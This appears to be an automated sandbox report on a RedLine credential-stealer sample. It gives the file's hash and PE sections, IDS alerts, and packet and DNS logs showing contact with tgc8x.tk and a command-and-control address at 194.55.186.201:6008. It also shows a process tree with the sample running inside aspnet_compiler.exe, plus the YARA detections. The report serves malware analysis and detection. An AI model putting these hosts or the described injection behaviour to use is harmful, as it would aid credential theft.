                                                            .rsrc0xc0000x5a60x600False0.4186197916666667data4.114149153750449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xe0000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountry
                                                            RT_VERSION0xc0a00x31cdata
                                                            RT_MANIFEST0xc3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.48.8.8.856572532012811 11/03/22-12:44:38.337914UDP2012811ET DNS Query to a .tk domain - Likely Hostile5657253192.168.2.48.8.8.8
                                                            50.115.174.192192.168.2.4443496952018856 11/03/22-12:44:39.556293TCP2018856ET TROJAN Windows executable base64 encoded4434969550.115.174.192192.168.2.4
                                                            50.115.174.192192.168.2.4443496962018856 11/03/22-12:44:40.820043TCP2018856ET TROJAN Windows executable base64 encoded4434969650.115.174.192192.168.2.4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 3, 2022 12:44:38.407645941 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:38.407692909 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:38.407783985 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:38.469727039 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:38.469760895 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:38.837925911 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:38.838049889 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:38.853115082 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:38.853154898 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:38.853569031 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:38.896302938 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.378637075 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.378685951 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.556324959 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.556360006 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.556368113 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.556541920 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.556580067 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.604000092 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.732975006 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.732997894 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.733069897 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.733079910 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.733130932 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.733139992 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.733177900 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.733206987 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.733226061 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.787089109 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.907883883 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.907963991 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.907995939 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.908026934 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.908195972 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.908226967 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.908267975 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.908303022 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.908324957 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.908340931 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.908396006 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:39.908418894 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:39.959028006 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.083826065 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.083920956 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.083951950 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.083975077 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084000111 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084011078 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084038019 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084050894 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084079981 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084084988 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084095001 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084135056 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084188938 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084243059 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084292889 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084342957 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084368944 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084418058 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084441900 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084495068 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084501028 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084513903 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084549904 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084567070 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084568024 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084578991 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084625959 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.084633112 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084681034 CET4434969550.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.084712029 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.093774080 CET49695443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.098267078 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.098331928 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.098745108 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.099368095 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.099400997 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.465075970 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.496548891 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.496577024 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820102930 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820142984 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820180893 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820293903 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.820327997 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.820374012 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.865231991 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.997716904 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997739077 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997828007 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997838974 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997839928 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.997905970 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997910976 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.997925043 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.997952938 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.998018026 CET4434969650.115.174.192192.168.2.4
                                                            Nov 3, 2022 12:44:40.998064995 CET49696443192.168.2.450.115.174.192
                                                            Nov 3, 2022 12:44:40.999274969 CET49696443192.168.2.450.115.174.192
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 3, 2022 12:44:38.337913990 CET5657253192.168.2.48.8.8.8
                                                            Nov 3, 2022 12:44:38.365986109 CET53565728.8.8.8192.168.2.4
                                                            Nov 3, 2022 12:45:07.954663992 CET5091153192.168.2.48.8.8.8
                                                            Nov 3, 2022 12:45:07.986056089 CET5968353192.168.2.48.8.8.8
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 3, 2022 12:44:38.337913990 CET192.168.2.48.8.8.80x53e5Standard query (0)tgc8x.tkA (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:45:07.954663992 CET192.168.2.48.8.8.80x5f34Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:45:07.986056089 CET192.168.2.48.8.8.80x3aStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 3, 2022 12:44:38.365986109 CET8.8.8.8192.168.2.40x53e5No error (0)tgc8x.tk50.115.174.192A (IP address)IN (0x0001)false
                                                            Nov 3, 2022 12:45:07.974468946 CET8.8.8.8192.168.2.40x5f34No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                            Nov 3, 2022 12:45:08.007771969 CET8.8.8.8192.168.2.40x3aNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                            • tgc8x.tk
                                                            • 194.55.186.201:6008

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:12:44:36
                                                            Start date:03/11/2022
                                                            Path:C:\Users\user\Desktop\StZAEFSb2j.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\StZAEFSb2j.exe
                                                            Imagebase:0x5d0000
                                                            File size:43520 bytes
                                                            MD5 hash:C71616E2B7CEDF9FC8E2CA6F6929ABDF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            Target ID:1
                                                            Start time:12:44:40
                                                            Start date:03/11/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            Imagebase:0xc10000
                                                            File size:55400 bytes
                                                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate

                                                            Target ID:2
                                                            Start time:12:44:40
                                                            Start date:03/11/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7c72c0000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            No disassembly